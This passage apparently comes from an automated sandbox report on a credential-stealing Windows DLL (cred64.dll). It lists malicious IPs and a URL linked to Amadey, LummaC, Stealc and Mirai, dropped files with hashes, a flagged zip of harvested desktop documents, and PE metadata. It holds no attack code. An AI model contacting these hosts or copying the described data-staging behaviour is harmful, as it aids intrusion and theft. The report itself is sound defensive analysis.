                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      SPD-NETTRfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 212.193.31.8
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                      • 212.193.31.8
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                      • 212.193.31.8
                                                                      6X4odkIkyK.exeGet hashmaliciousAmadeyBrowse
                                                                      • 212.193.31.8
                                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.72.8.231
                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.72.8.231
                                                                      nshkmpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.72.8.231
                                                                      mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 2.58.124.230
                                                                      63Blg3Psdt.exeGet hashmaliciousDCRatBrowse
                                                                      • 185.118.143.220
                                                                      https://vmehy.daxizzobui.top/Get hashmaliciousUnknownBrowse
                                                                      • 195.133.45.183

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................

                                                                      C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):3084
                                                                      Entropy (8bit):7.73805150023226
                                                                      Encrypted:false
                                                                      SSDEEP:96:zBPwzYgAqR7kZSYsntEZSYsntGu/cNzrCQ:zBPwzYgsZS0ZS22cNzD
                                                                      MD5:AF594BEB9BB0CB2510C0816B2F502F05
                                                                      SHA1:DD4C7398AAF17CE5308FF52B57CAD4CC327243A3
                                                                      SHA-256:C565E96C12DE909D97B26655C352C08EC71C7C41567928E83BBEE4E8D27D42AB
                                                                      SHA-512:36E38E537DE2D8901573DD238440441C0D77772C2A0A5C5F1E4AD5431FE7F2F47FE27EAC698EAF2FB8627FC872E5688641F934FC036D561534EB75B3BA3C9770
                                                                      Malicious:true
                                                                      Preview:PK........T@DW..............._Files_\DVWHKMNFNN.docx..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........T@DW/1............._Files_\LTKMYBSEYZ.docx.SI.E!..w.?.....Y...vE..M...tt.sO\...i..BI.T|..rp..d.d.i..}C.s|.@^mn..\.U..h..z....).>.q....?.= ..}E..(.Yb.s.:..c....."...~.3..y.....g....k.(..."........q9&a..>.!.S.>..a?'..b....:.....}...P+..-.........=.|...T..Z.ri..1....r.|..?w.

                                                                      C:\Users\user\AppData\Local\Temp\_Files_\DVWHKMNFNN.docx

                                                                      Download File
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.694985340190863
                                                                      Encrypted:false
                                                                      SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                      MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                      SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                      SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                      SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                      Malicious:false
                                                                      Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                      C:\Users\user\AppData\Local\Temp\_Files_\LTKMYBSEYZ.docx

                                                                      Download File
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.687722658485212
                                                                      Encrypted:false
                                                                      SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                      MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                      SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                      SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                      SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                      Malicious:false
                                                                      Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                      C:\Users\user\AppData\Local\Temp\_Files_\LTKMYBSEYZ.xlsx

                                                                      Download File
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.687722658485212
                                                                      Encrypted:false
                                                                      SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                      MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                      SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                      SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                      SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                      Malicious:false
                                                                      Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                      C:\Users\user\AppData\Local\Temp\_Files_\WUTJSCBCFX.xlsx

                                                                      Download File
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.688284131239007
                                                                      Encrypted:false
                                                                      SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                      MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                      SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                      SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                      SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                      Malicious:false
                                                                      Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ilusnse.tvb.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mqnktsu.wd3.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zkmkwhf.kl3.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vvobsol.rfx.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dl5ssxxk.qtp.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ms2u3my1.43o.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o3n3mf3w.ynd.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o5ta3aps.bxk.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpcapp5h.jmh.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukf3svvw.wk1.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeujjepz.ydq.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4vdxfnc.wa5.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                      Entropy (8bit):6.466732826613367
                                                                      TrID:
                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                      File name:cred64.dll.dll
                                                                      File size:1'281'024 bytes
                                                                      MD5:d862c12a4467ebae581a8c0cc3ea2211
                                                                      SHA1:9e797375b9b4422b2314d3e372628643ccf1c5db
                                                                      SHA256:47f8a270b27c18bab9013f4a8f0ee6e877e4050bd4018d682eb502bcfd5bff6d
                                                                      SHA512:cf6545df4a244bb7dc699a565759f97c759ba19bcc9ad9ad91a20cd07aee19cbe10eb82dd21416b717581b34dc4f24ba6d43a00e7d8018b8be133dbbc9e8113c
                                                                      SSDEEP:24576:MO/VvL5QafhQsnoXyaoMferXQ5rnxQBuLv8Y4JKMfUO9l:Z5nfhQzOMoA5rnxHv8PKre
                                                                      TLSH:C0557C0BA36141BCD4BBE1789A175A47F775704603709AEB07E446AA3F13BE19EBE310
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D................................s.............................................................X.............Rich...........

                                                                      File Icon

                                                                      Icon Hash:7ae282899bbab082

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x1800cfac4
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x180000000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
